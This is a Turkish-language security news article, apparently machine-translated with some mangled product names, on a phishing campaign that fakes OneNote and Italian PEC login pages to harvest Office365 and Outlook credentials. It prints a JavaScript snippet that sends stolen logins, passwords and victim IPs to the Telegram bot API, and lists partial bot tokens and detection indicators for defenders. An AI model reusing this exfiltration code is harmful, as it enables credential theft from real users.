Bilgisayar korsanları, Office365’i ve Outlook kimlik bilgilerini yakalamak için sahte onenote girişini kullanır


Güvenlik analistleri tarafından yapılan yakın tarihli bir soruşturma, İtalyan ve ABD kullanıcılarını hedefleyen kalıcı bir kimlik avı kampanyasını ortaya çıkardı ve kimlik bilgisi hasat ve veri açığa çıkması için ücretsiz bulut platformları ve telgraf botları zinciri kullandı.

Saldırı genellikle Microsoft OneNote veya İtalya’nın PEC (Posta Eleettronica Sertifikası) e -posta sistemi gibi meşru portallar olarak görünen, Notion veya Google Dokümanlar gibi hizmetlerde barındırılan bir kimlik avı sayfası ile başlar.

Mağdurlar, kimlik bilgilerini girmeleri istenen sahte bir giriş sayfasına yol açan bir bağlantıyı tıklamak için e -posta yoluyla çekilir.

– Reklamcılık –
Google Haberleri

Gönderildikten sonra, kimlik komut dosyası yalnızca girilen kimlik bilgilerini değil, aynı zamanda kurbanın IP adresini de toplar ve genellikle ipify.org hizmetini kullanır.

Çalınan veriler daha sonra Telegram bot API’si üzerinden, bot jetonları ve kötü amaçlı JavaScript’e sabitlenmiş sohbet kimlikleri ile eklenir.

Veriler gönderildikten sonra, kullanıcılar meşruiyet yanılsamasını koruyarak gerçek Microsoft giriş sayfasına yönlendirilir.

Teknik Sunum Kodu Örnek:

javascript// Capture victim's IP address
fetch('https://api.ipify.org?format=json')
  .then(response => response.json())
  .then(data => {
    let ip = data.ip;
    let message = `Login: ${login}\nPassword: ${password}\nIP: ${ip}`;
    // Exfiltrate via Telegram bot
    fetch(`https://api.telegram.org/bot/sendMessage?chat_id=&text=${encodeURIComponent(message)}`);
  });

Yer değiştirmek Ve saldırgan kontrollü değerlerle.

Kimlik avı tekniklerinde evrim ve kalıplar

Birden fazla örneğin analizi, kimlik avı temaları ve görsel düzenler değişmiş olsa da – bazen onenote taklit eden, diğer zamanlarda PEC – altında yatan eksfiltrasyon mekanizmasının tutarlı kaldığını ortaya koymaktadır.

Erken varyantlar veri hırsızlığı için basit form gönderimleri kullandı, ancak Şubat 2022’ye kadar saldırganlar, bu teknikler daha sonra terk edilmiş olsa da, zaman zaman iç içe URL kodlama veya Base64 yoluyla gizlenme eklenerek telgraf bot tabanlı eksfiltrasyon üzerinde standartlaştı.

Kampanyanın altyapısı aşağıdakilerle karakterize edilmektedir:

  • Kimlik avı içeriğini barındırmak için ücretsiz veya düşük maliyetli bulut hizmetlerinin (kavram, aksaklık, Google Dokümanlar, Renderforest) kullanılması.
  • Sadece temel şaşkınlık ve gelişmiş önleme önlemleri olmayan minimal kaçırma teknikleri.
  • Telgraf botlarına hazır komut ve kontrol (C2) altyapısı olarak güven.

Tablo: Kimlik avı mekanizmalarının evrimi

Tarih aralığıBarındırma zinciriEksfiltrasyon yöntemiDikkate değer değişiklikler
29 Ocak 2022Notion + GlitchForm GöndermeURL kodlaması, telgraf yok
2 Şub 2022Notion + GlitchTelgraf botuİç içe URL kodlama
23 Ağu 2023Notion + GlitchTelgraf botuIP Adresi Koleksiyonu Eklendi
Temmuz – Aralık 2024Google Docs + BackblazeTelegram Bot (Base64)Base64 gizlemesi ile denenmiş
7 Nisan 2025Notion + GlitchTelgraf botuGüncel, aerodinamik, şaşkınlık yok

Tehdit oyuncusu ve tespit stratejilerinin profili

Bu kampanyanın arkasındaki tehdit oyuncusu, gelişmiş teknik becerilere sahip değil, sadeliği ve sofistike olarak ölçeklenebilirliği destekliyor.

Kampanya, düşük hacimli ancak kalıcıdır, erişim brokering’e odaklanmaya odaklanıyor-diğer siber suçlulara hasat edilmiş kimlik bilgileri sunan-doğrudan sömürüden ziyade.

Temel Teknik Göstergeler:

  • Kimlik avı senaryolarında sert kodlanmış telgraf bot jetonları ve sohbet kimlikleri.
  • Davranışsal Desen: Notion → Glitch → Telegram API.
  • İtalyan dilinin kullanımı ve İtalyan iş alanlarının hedeflenmesi.

Örnek telgraf bot jetonları ve sohbet kimlikleri:

Bot adıKullanıcı adıJeton (kısmi)Sohbet kimliği
Sultana@Sultannanewbot7547274214: aae2… j4wl9se6475928726
REMAXX24@remaxx24bot707231661: aaen… grntzy5308217415
Sonuç@ResultantNewbot6717079: Aahug … hnvq_e6475928726

Tespit önerileri:

  • Telegram bot API alanlarına ağ trafiğini izleyin, özellikle kavram veya aksaklık barındıran sayfalara erişim ile birlikte.
  • Web trafiğinde sert kodlanmış telgraf bot jetonları için imza tabanlı algılama uygulayın.
  • Kimlik avı gösteren alan zincirlerini ve sayfa başlıklarını izleyin (örn., “One Not | Microsoft”, “Aruba | PEC”).

Bu kampanya, saldırganların kolayca erişilebilir bulut altyapısından ve kimlik hırsızlığı için mesajlaşma API’lerinden yararlandığı ve uyanık izleme ve uyarlanabilir savunma stratejileri ihtiyacının altını çizdiği kimlik avı operasyonlarının devam eden evrimini vurgulamaktadır.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!



Source link